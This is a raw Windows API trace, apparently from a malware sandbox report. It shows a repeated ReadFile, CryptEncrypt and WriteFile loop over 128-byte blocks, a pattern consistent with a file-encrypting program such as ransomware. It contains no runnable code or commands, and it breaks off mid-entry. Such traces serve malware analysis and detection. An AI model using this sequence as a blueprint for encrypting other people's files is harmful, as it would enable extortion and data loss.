[0040.681] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.681] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.681] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.681] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.681] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.681] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.681] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.681] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.681] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.681] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.681] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.681] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.681] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.681] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.681] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.681] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.681] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.681] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.681] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.681] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.681] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.681] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.681] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.681] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.682] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.682] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.682] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.682] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.682] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.682] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.682] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.682] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.682] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.682] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.682] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.682] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.682] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.682] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.682] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.682] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.682] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.682] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.682] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.682] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.682] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.682] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.682] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.682] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.683] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.683] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.683] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.683] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.683] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.683] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.683] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.683] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.683] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.683] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.683] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.683] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.683] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.683] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.683] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.683] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.683] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.683] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.683] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.683] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.683] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.683] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.683] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.683] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.684] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.684] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.684] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.684] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.684] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.684] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.684] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.684] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.684] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.684] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.684] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.684] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.684] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.684] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.684] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.684] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.684] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.684] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.684] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.684] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.684] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.684] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.684] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.685] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.685] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.685] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.685] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.685] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.685] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.685] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0040.685] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.685] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0040.685] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, 